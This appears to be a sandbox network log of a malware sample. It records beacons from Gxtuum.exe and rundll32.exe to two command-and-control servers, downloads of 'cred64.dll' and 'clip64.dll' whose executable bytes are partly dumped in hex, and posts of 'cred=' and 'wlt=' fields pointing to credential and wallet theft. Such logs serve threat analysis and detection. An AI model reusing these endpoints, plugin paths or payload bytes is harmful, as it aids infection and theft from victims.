Dec 13, 2024 07:46:56.975074053 CET	1.1.1.1	192.168.2.4	0x8668	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 07:46:56.975074053 CET	1.1.1.1	192.168.2.4	0x8668	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.58.99	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:46:56.975074053 CET	1.1.1.1	192.168.2.4	0x8668	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.58.101	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:46:56.975074053 CET	1.1.1.1	192.168.2.4	0x8668	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.58.98	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:46:56.975074053 CET	1.1.1.1	192.168.2.4	0x8668	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.58.100	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.81.68.148

185.81.68.147

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:04.489165068 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:05.823302984 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:04.489203930 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:05.831722021 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:04.517991066 CET	66	OUT	GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1 Host: 185.81.68.147
Dec 13, 2024 07:47:05.846211910 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 18:53:38 GMT ETag: "138c00-629173b693080" Accept-Ranges: bytes Content-Length: 1281024 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 e5 c9 44 c2 84 a7 17 c2 84 a7 17 c2 84 a7 17 d6 ef a3 16 d6 84 a7 17 d6 ef a4 16 d2 84 a7 17 d6 ef a2 16 73 84 a7 17 90 f1 a2 16 86 84 a7 17 90 f1 a3 16 cd 84 a7 17 90 f1 a4 16 c8 84 a7 17 d6 ef a6 16 cf 84 a7 17 c2 84 a6 17 01 84 a7 17 0e f1 ae 16 c6 84 a7 17 0e f1 a7 16 c3 84 a7 17 0e f1 58 17 c3 84 a7 17 0e f1 a5 16 c3 84 a7 17 52 69 63 68 c2 84 a7 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 82 96 5a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 c8 0f 00 00 38 04 00 00 00 00 00 c4 fa 0c 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$DsXRichPEdZg" 8P`~X~ `0lpp8.text `.rdata@@.dataD@.pdata`@@_RDATAt@@.rsrc v@@.relocl0x@B
Dec 13, 2024 07:47:05.846245050 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 07 63 11 00 48 8d Data Ascii: H(A HcHcH,H(+H(A HbH03HlH(H(AHbH HH(H(A Hb
Dec 13, 2024 07:47:05.846383095 CET	1236	IN	Data Raw: 48 8d 0d 70 be 12 00 e8 d3 0b 0c 00 48 8d 0d ec 8c 0f 00 48 83 c4 28 e9 9b e6 0c 00 cc cc cc 48 83 ec 28 41 b8 14 00 00 00 48 8d 15 c7 62 11 00 48 8d 0d 60 c3 12 00 e8 a3 0b 0c 00 48 8d 0d 2c 8d 0f 00 48 83 c4 28 e9 6b e6 0c 00 cc cc cc 48 83 ec Data Ascii: HpHH(H(AHbH`H,H(kH(AHbHPsHlH(;H(AHbHCHH(H(A HbHpHH(H(E3HH
Dec 13, 2024 07:47:05.846417904 CET	1236	IN	Data Raw: b8 28 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d 50 bd 12 00 e8 f3 06 0c 00 48 8d 0d 6c 93 0f 00 48 83 c4 28 e9 bb e1 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d a0 c1 12 00 e8 c3 06 0c 00 48 8d 0d ac 93 0f 00 48 83 c4 Data Ascii: (H`HPHlH(H(AH`HHH(H(AH`HPHH([H(AH`HcH,H(+H(AH_`Hp3HlH(H(A
Dec 13, 2024 07:47:05.846453905 CET	1236	IN	Data Raw: 0b dd 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 e7 5d 11 00 48 8d 0d f0 b4 12 00 e8 13 02 0c 00 48 8d 0d ec 99 0f 00 48 83 c4 28 e9 db dc 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 bf 5d 11 00 48 8d 0d 40 bf 12 00 e8 e3 01 Data Ascii: H(AH]HHH(H(AH]H@H,H(H(AH]HHlH({H(AHo]HHH(KH(AHO]H0SHH(
Dec 13, 2024 07:47:05.846489906 CET	1236	IN	Data Raw: 48 8d 0d 2c a0 0f 00 48 83 c4 28 e9 2b d8 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 7f 5c 11 00 48 8d 0d 50 ba 12 00 e8 33 fd 0b 00 48 8d 0d 6c a0 0f 00 48 83 c4 28 e9 fb d7 0c 00 cc cc cc 48 83 ec 28 41 b8 28 00 00 00 48 8d 15 87 5c Data Ascii: H,H(+H(A4H\HP3HlH(H(A(H\H HH(H(AH\HHH(H(A4Hg\H`H,H(kH(A(Ho\HPsH
Dec 13, 2024 07:47:05.846741915 CET	1236	IN	Data Raw: 23 aa 12 00 e8 86 f8 0b 00 48 8d 0d 4f a9 0f 00 48 83 c4 28 e9 4e d3 0c 00 cc cc cc cc cc cc 48 8d 0d a9 a9 0f 00 e9 3c d3 0c 00 cc cc cc cc 48 83 ec 28 45 33 c0 48 8d 15 e2 b0 10 00 48 8d 0d e3 ae 12 00 e8 46 f8 0b 00 48 8d 0d ef a9 0f 00 48 83 Data Ascii: #HOH(NH<H(E3HHFHH(HIdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHHHH
Dec 13, 2024 07:47:05.846777916 CET	1236	IN	Data Raw: 00 00 48 c7 80 80 02 00 00 0f 00 00 00 48 89 90 88 02 00 00 48 89 90 98 02 00 00 48 c7 80 a0 02 00 00 0f 00 00 00 48 89 90 a8 02 00 00 48 89 90 b8 02 00 00 48 c7 80 c0 02 00 00 0f 00 00 00 48 89 90 c8 02 00 00 48 89 90 d8 02 00 00 48 c7 80 e0 02 Data Ascii: HHHHHHHHHHH HHkdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHH
Dec 13, 2024 07:47:05.846945047 CET	1236	IN	Data Raw: c2 45 85 c0 7f d1 41 ff c8 45 85 c0 78 1e 41 0f b6 01 42 0f b6 8c 30 30 48 11 00 41 0f b6 02 42 0f b6 84 30 30 48 11 00 2b c8 75 04 48 83 c7 07 45 33 db 4c 8b d7 48 85 ff 75 05 45 8b d3 eb 19 44 38 1f 74 0a 66 90 49 ff c2 45 38 1a 75 f8 44 2b d7 Data Ascii: EAExAB00HAB00H+uHE3LHuED8tfIE8uD+A?AHL5@LAILEt+At#AB10HB820HuIIxAB00HAB00H+u.B0<Ft"AHA\|3H\$ Hl$(Ht$
Dec 13, 2024 07:47:05.846980095 CET	1236	IN	Data Raw: 01 00 ff c7 48 83 c6 20 3b 7b 28 7c d6 48 8b 4c 24 28 8b 44 24 30 44 89 75 00 89 01 e9 19 01 00 00 48 8b 7b 08 48 8d 4c 24 30 48 89 8b 20 03 00 00 41 8b c6 89 44 24 30 48 85 ff 74 67 66 0f 1f 44 00 00 48 8b d7 48 8b cb e8 55 5e 02 00 4c 39 b3 20 Data Ascii: H ;{(\|HL$(D$0DuH{HL$0H AD$0HtgfDHHU^L9 tHH1-3H;hr"H;psH`HLH`HL,HXHuD$0L DuAAE9S(~FD$MfDHC JDHtH@HDE
Dec 13, 2024 07:47:05.966497898 CET	1236	IN	Data Raw: 80 79 28 00 48 89 1c 24 74 0c 8b 41 08 44 8b 49 0c 8b 59 10 eb 0e 41 b9 01 00 00 00 b8 d0 07 00 00 41 8b d9 44 8d 40 ff 41 c6 43 2a 01 41 83 f9 02 41 8d 49 0c 44 0f 4f c0 b8 1f 85 eb 51 41 f7 e8 44 8b d2 41 c1 fa 05 41 8b c2 c1 e8 1f 44 03 d0 b8 Data Ascii: y(H$tADIYAAD@AC*AAIDOQADAADhAAOiQQDAADAlDiAAAA+H$A{)fn\VYVH,ItRAkC<AC YWAC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:07.453156948 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:08.802464008 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:07.468822002 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:08.830229044 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	185.81.68.147	80	1220	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:09.170512915 CET	173	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Dec 13, 2024 07:47:10.493333101 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	185.81.68.147	80	3272	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:09.188791990 CET	173	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Dec 13, 2024 07:47:10.515801907 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:10.249389887 CET	66	OUT	GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1 Host: 185.81.68.147
Dec 13, 2024 07:47:11.583082914 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 18:53:40 GMT ETag: "1f000-629173b87b500" Accept-Ranges: bytes Content-Length: 126976 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$P@@@~@RichPELZg!Dbp`0@P8@`L.textCD `.rdata*u`vH@@.data@.rsrc@@.reloc@B
Dec 13, 2024 07:47:11.583102942 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 98 ae 01 10 b9 60 e8 01 10 e8 7f 4d 00 00 68 70 29 01 Data Ascii: j h`Mhp)ZYj hx_Mh)ZYjh?Mh0ZYj hMhZYjhLh*jZYjh
Dec 13, 2024 07:47:11.583115101 CET	1236	IN	Data Raw: 24 af 01 10 b9 d8 e8 01 10 e8 df 4c 00 00 68 50 2b 01 10 e8 4a 5a 00 00 59 c3 cc cc cc 6a 14 68 44 af 01 10 b9 f0 e8 01 10 e8 bf 4c 00 00 68 b0 2b 01 10 e8 2a 5a 00 00 59 c3 cc cc cc 6a 20 68 5c af 01 10 b9 08 e9 01 10 e8 9f 4c 00 00 68 10 2c 01 Data Ascii: $LhP+JZYjhDLh+*ZYj h\Lh,ZYjh} Lhp,YYjh}8_Lh,YYjhP?Lh0-YYjhhLh-YYjhKh-
Dec 13, 2024 07:47:11.583127022 CET	1236	IN	Data Raw: 8a 55 00 00 59 c3 cc cc cc 6a 00 68 7d af 01 10 b9 80 ec 01 10 e8 ff 47 00 00 68 f0 39 01 10 e8 6a 55 00 00 59 c3 cc cc cc 6a 0c 68 e0 b2 01 10 b9 98 ec 01 10 e8 df 47 00 00 68 50 3a 01 10 e8 4a 55 00 00 59 c3 cc cc cc 6a 14 68 f0 b2 01 10 b9 b0 Data Ascii: UYjh}Gh9jUYjhGhP:JUYjhGh:*UYjhGh;UYjhGhp;TYjLhX_Gh;TYjh?Gh0<TYjdh(
Dec 13, 2024 07:47:11.583137989 CET	1236	IN	Data Raw: 10 e8 3f 43 00 00 68 30 48 01 10 e8 aa 50 00 00 59 c3 cc cc cc 6a 0c 68 0c b7 01 10 b9 28 f0 01 10 e8 1f 43 00 00 68 90 48 01 10 e8 8a 50 00 00 59 c3 cc cc cc 6a 34 68 1c b7 01 10 b9 40 f0 01 10 e8 ff 42 00 00 68 f0 48 01 10 e8 6a 50 00 00 59 c3 Data Ascii: ?Ch0HPYjh(ChHPYj4h@BhHjPYj(hTXBhPIJPYjhpBhI*PYj<hBhJPYj0hBhpJOYjh_BhJOY
Dec 13, 2024 07:47:11.583257914 CET	1236	IN	Data Raw: 05 00 00 83 7d 30 00 0f 84 02 05 00 00 83 7d 48 00 0f 84 f8 04 00 00 c7 85 d8 fb ff ff 00 00 00 00 c7 85 e8 fb ff ff 00 00 00 00 c7 85 ec fb ff ff 0f 00 00 00 c6 85 d8 fb ff ff 00 c6 45 fc 03 8d 8d c0 fb ff ff 6a 2f c7 85 c0 fb ff ff 00 00 00 00 Data Ascii: }0}HEj/h$=jjjjhTE0a}jjjjjECEjPPQ4a}4jjjjjE CE PhXQ8a}LM8uHCM8
Dec 13, 2024 07:47:11.583300114 CET	1236	IN	Data Raw: 00 00 00 c6 45 20 00 83 fa 10 0f 82 cf 00 00 00 8b 4d 38 42 8b c1 81 fa 00 10 00 00 0f 82 b3 00 00 00 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 c6 00 00 00 e9 9a 00 00 00 6a 00 c7 07 00 00 00 00 8b cf c7 47 10 00 00 00 00 c7 47 14 0f 00 00 Data Ascii: E M8BI#+jGGh}=9Ur(MBrI#+wvRQCU4EEEDM B(I#+w,RQBMdY_^M3
Dec 13, 2024 07:47:11.583321095 CET	1236	IN	Data Raw: 00 00 c6 45 ac 00 83 fa 10 72 28 8b 4d c8 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 38 52 51 e8 a8 3e 00 00 83 c4 08 a1 34 f2 01 10 46 8b 15 20 f2 01 10 e9 a6 fe ff ff 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f Data Ascii: Er(MBrI#+w8RQ>4F MdY_^M3m>]pUjh$dPSVW3PEdEEEEE }4u0CE P4}EuCEP353=fD
Dec 13, 2024 07:47:11.583333015 CET	1236	IN	Data Raw: 75 2d 8b 4f 14 8b c7 83 f9 10 72 02 8b 07 80 3c 30 20 74 1b 8b c7 83 f9 10 72 02 8b 07 83 7b 14 10 8b cb 72 02 8b 0b 8a 04 30 e9 cc 00 00 00 83 7f 14 10 89 7d f8 72 05 8b 07 89 45 f8 8b 1d 48 f2 01 10 33 d2 8b 0d 4c f2 01 10 85 db 74 2b 8b 45 f8 Data Ascii: u-Or<0 tr{r0}rEH3Lt+E0E]8C88HtB;rExr3t715LMf]8C88Ht@;r=L8C58+3]{r
Dec 13, 2024 07:47:11.583344936 CET	1236	IN	Data Raw: 87 84 01 00 00 52 51 e8 24 35 00 00 83 c4 08 0f 10 4d bc 83 7d 1c 10 8d 55 08 f3 0f 7e 45 cc 8d 45 d8 0f 43 55 08 83 7d d0 10 8b 75 cc 66 0f 7e c9 0f 11 4d d8 0f 43 c1 66 0f d6 45 e8 8b 4d 18 89 4d d4 3b f1 75 61 83 ee 04 72 16 0f 1f 44 00 00 8b Data Ascii: RQ$5M}U~EECU}uf~MCfEMM;uarD;ust4:u't)H:JutH:Jut@:Bt3ME0Gu;3Ur/MFrI#+VQF4UE
Dec 13, 2024 07:47:11.703248978 CET	1236	IN	Data Raw: 8b 4d f0 33 cd e8 44 30 00 00 8b e5 5d c3 e8 86 62 00 00 e8 75 27 00 00 cc cc cc cc cc 55 8b ec 6a ff 68 2d 26 01 10 64 a1 00 00 00 00 50 53 56 57 a1 08 e0 01 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 ba 7d af 01 10 c7 45 fc 00 00 00 00 8d 4d 08 e8 Data Ascii: M3D0]bu'Ujh-&dPSVW3PEd}EM(\|E@Pl5M}CM+IDuNFu+FVj`VSW`PjZW`j(aaWja aUr(MBrI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:10.546853065 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:11.884128094 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:10.577186108 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:11.923661947 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	185.81.68.148	80	1220	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:10.616377115 CET	176	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Dec 13, 2024 07:47:11.951952934 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	185.81.68.148	80	3272	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:10.638103008 CET	176	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Dec 13, 2024 07:47:11.970105886 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	185.81.68.147	80	6828	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:13.043967962 CET	156	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
